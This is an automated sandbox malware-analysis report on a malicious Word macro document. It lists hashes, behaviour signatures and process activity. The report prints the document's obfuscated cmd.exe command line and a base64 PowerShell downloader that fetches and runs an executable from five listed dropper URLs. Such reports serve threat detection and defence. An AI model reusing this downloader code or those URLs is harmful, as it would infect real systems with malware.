Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    26-04-2024 08:00

General

  • Target

    00539bd67c6d76554cf98b8a0534b29a_JaffaCakes118.doc

  • Size

    90KB

  • MD5

    00539bd67c6d76554cf98b8a0534b29a

  • SHA1

    ea36a86e04efbcb8d7097b6cb7db6d849ea6c194

  • SHA256

    a07d61afa7f207280178d99e18dd80999cb15636b4815d1115379ed57739ff30

  • SHA512

    6fada542f3228ca31d7824cbc63d140d327db52671f51a781ab8a2923bb52c6a6191f3da60750cd964d1ae513f2dac1662690979e9eecead3ce185c1ff8f83e5

  • SSDEEP

    1536:fptJlmrJpmxlRw99NBd+aBd1dfaJKI+j:xte2dw99fpja0I+j

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://djtosh.co.za/rrp

exe.dropper

http://virginie.exstyle.fr/a

exe.dropper

http://projettv.baudtanette.fr/FZ00c23Z

exe.dropper

http://mujerproductivaradio.jacquelinezorrilla.com/O

exe.dropper

http://esinvestmentinc.ezitsolutions.net/UIf

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\00539bd67c6d76554cf98b8a0534b29a_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2984
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /V:^o ^ ^ /R" ^s^e^T ^ ^ ^Qud^b=AACAg^AA^IA^ACAg^A^A^I^AACAg^A^AI^AACA^g^AA^I^AACAgA^A^IA^ACAgAQ^fA0^HA7B^Aa^AMGA^0BQ^Y^A^MGA9^B^w^OAs^GAhBQZ^AI^H^AiBw^O^A^I^E^A^w^BgcA^QCAg^AQbA^U^GA0B^Q^S^A0C^AlBw^aA8^GA^2B^g^b^A^kEA7^A^QKAI^E^A^wB^gcA^QCAgAA^LA^4^EA^Z^Bwc^A^QCA^oA^QZ^A^wG^ApB^gR^A^Q^GAh^B^wb^A^wG^Au^BwdA8^G^AEB^g^L^A^gGAkBQW^A^QC^A^7BQeAI^HA0^B^weA^kC^A^k^Bw^U^Ao^HAkA^A^I^A4^GApBA^I^A^4^E^AZBwcA^QCAo^A^AaAMG^AhBQZAIHAvB^gZ^As^D^An^AQZAg^HAl^B^g^L^AcCAr^A^Q^b^AEF^A^D^B^AJ^AsCAn^A^A^XAcC^Ar^AwYAkGAs^Bg^Y^A^U^HAwBg^OA^Y^HAuBQZA^QCA^9A^g^QA^A^H^A^y^B^AJ^AsDAn^A^AOA^QD^A^3^A^w^JA^AC^A9A^A^IA^0GARBwQA^QC^A7A^Q^K^AcCA^A^Bw^J^A^gC^A^0B^Qa^A^w^GA^wBwUA4C^An^A^gZ^A^kEAVBw^LA^Q^H^Al^B^gb^A4CA^zBgbA8^G^Ap^BAdAUH^AsB^w^b^AM^HA^0^B^Q^a^A^oHA^lBgL^AMG^Au^B^QaAQHAuBQ^Z^A0G^A0^BwcA^U^GA^2BgbAkG^Az^B^Q^Z^A8CAv^A^g^OA^A^HA^0^B^Ad^Ag^G^A^A^B^w^T^A^8C^A^t^Bw^bAMGA^uA^QYAwG^A^sB^Q^a^AIHA^yB^w^b^AoHA^l^B^gbA^kG^As^B^QZA^UHA^x^Bw^Y^AE^G^A^qBg^LA8GApB^AZ^A^E^G^Ay^B^QY^A^YHA^p^BA^dAMGA^1^B^A^ZA8GAy^BAcAI^H^AlBg^a^A^UHAtBw^L^A8C^A6^A^Ac^AQ^HA^0B^A^aA^AEA^a^Bw^M^AI^D^A^jB^AMA^A^D^Aa^B^gRA8C^A^yBg^Z^A^4CAl^BAdAQH^AlBgbAE^G^A0BAZA^U^HA^hBgYA4C^A2^BA^d^A^Q^H^A^lB^gaA^8^G^AyBAcA8C^AvA^g^O^AA^HA^0B^A^d^AgG^A^A^B^Q^Y^A^8C^AyBg^Z^A^4C^A^l^B^A^b^Ak^H^A^0B^wcA^g^H^A^l^B^g^L^AU^G^A^pBgb^Ak^GAnB^gc^A^kG^A2^Bw^L^A^8CA6^A^AcA^Q^HA^0^BAa^A^A^EAw^Bgc^AIH^AvAQY^A^oH^Au^AwbA^M^G^Au^A^AaAM^H^AvB^AdA^o^GAk^B^w^LA8CA6AAc^AQHA^0BA^a^AcCA9A^AZAM^FA^6BAJA^s^DA^0B^gbAU^GA^p^B^Ab^AM^E^A^iBQZAcFA^u^A^A^dA^UG^AOB^A^I^A^QHAjB^Q^Z^AoG^A^iB^w^bA^0CA^3^BQ^ZA^4G^A9^AAa^A^QG^A^Z^B^AJ ^e^-^ l^le^hsre^w^op& f^Or /^l %^u ^IN ( ^ ^1^0^53 ^,^ ^ ^-1, ^ ^ 0) d^O ^sE^t ^Y4^Z=!^Y4^Z!!^Qud^b:~%^u, 1!&&^i^f %^u ^l^eQ ^0 C^a^lL %^Y4^Z:^~ -^10^5^4% "
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2840
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -e JABZAGQAaAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6AFMAZAA9ACcAaAB0AHQAcAA6AC8ALwBkAGoAdABvAHMAaAAuAGMAbwAuAHoAYQAvAHIAcgBwAEAAaAB0AHQAcAA6AC8ALwB2AGkAcgBnAGkAbgBpAGUALgBlAHgAcwB0AHkAbABlAC4AZgByAC8AYQBAAGgAdAB0AHAAOgAvAC8AcAByAG8AagBlAHQAdAB2AC4AYgBhAHUAZAB0AGEAbgBlAHQAdABlAC4AZgByAC8ARgBaADAAMABjADIAMwBaAEAAaAB0AHQAcAA6AC8ALwBtAHUAagBlAHIAcAByAG8AZAB1AGMAdABpAHYAYQByAGEAZABpAG8ALgBqAGEAYwBxAHUAZQBsAGkAbgBlAHoAbwByAHIAaQBsAGwAYQAuAGMAbwBtAC8ATwBAAGgAdAB0AHAAOgAvAC8AZQBzAGkAbgB2AGUAcwB0AG0AZQBuAHQAaQBuAGMALgBlAHoAaQB0AHMAbwBsAHUAdABpAG8AbgBzAC4AbgBlAHQALwBVAEkAZgAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAQwBRAG0AIAA9ACAAJwA3ADQAOAAnADsAJAByAHAAQgA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABDAFEAbQArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAcwBZAE4AIABpAG4AIAAkAHoAUwBkACkAewB0AHIAeQB7ACQAWQBkAGgALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAcwBZAE4ALAAgACQAcgBwAEIAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAcgBwAEIAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2396

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      4d74944a6b65abfe5cbdd1d885ed309c

      SHA1

      c1462b0722ba9a9c936d694e71a8f14d88de7331

      SHA256

      c5160ac12f6df1f0da9efbcc593aec9bcb910a50a9823e1e54e5e230d3740856

      SHA512

      27c4981057693cd28ca5e0736ef09614204f1da81d582b66d68bf735e7f75bb89087073b038437f9357a25576e53bf5ef692747eb8fb8c07ba05240b4f41d4a7

    • memory/1964-37-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-87-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1964-8-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-9-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-10-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-11-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-13-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-12-0x0000000006220000-0x0000000006320000-memory.dmp

      Filesize

      1024KB

    • memory/1964-35-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-14-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-22-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-21-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-24-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-29-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-28-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-31-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-34-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-0-0x000000002FFC1000-0x000000002FFC2000-memory.dmp

      Filesize

      4KB

    • memory/1964-15-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-2-0x0000000070DED000-0x0000000070DF8000-memory.dmp

      Filesize

      44KB

    • memory/1964-88-0x0000000070DED000-0x0000000070DF8000-memory.dmp

      Filesize

      44KB

    • memory/1964-45-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-46-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-50-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-52-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-44-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-42-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1964-72-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-67-0x0000000070DED000-0x0000000070DF8000-memory.dmp

      Filesize

      44KB

    • memory/1964-68-0x0000000006220000-0x0000000006320000-memory.dmp

      Filesize

      1024KB

    • memory/1964-69-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/1964-70-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

    • memory/2396-71-0x000000006A310000-0x000000006A8BB000-memory.dmp

      Filesize

      5.7MB

    • memory/2396-66-0x0000000002A20000-0x0000000002A60000-memory.dmp

      Filesize

      256KB

    • memory/2396-65-0x0000000002A20000-0x0000000002A60000-memory.dmp

      Filesize

      256KB

    • memory/2396-63-0x000000006A310000-0x000000006A8BB000-memory.dmp

      Filesize

      5.7MB

    • memory/2396-64-0x000000006A310000-0x000000006A8BB000-memory.dmp

      Filesize

      5.7MB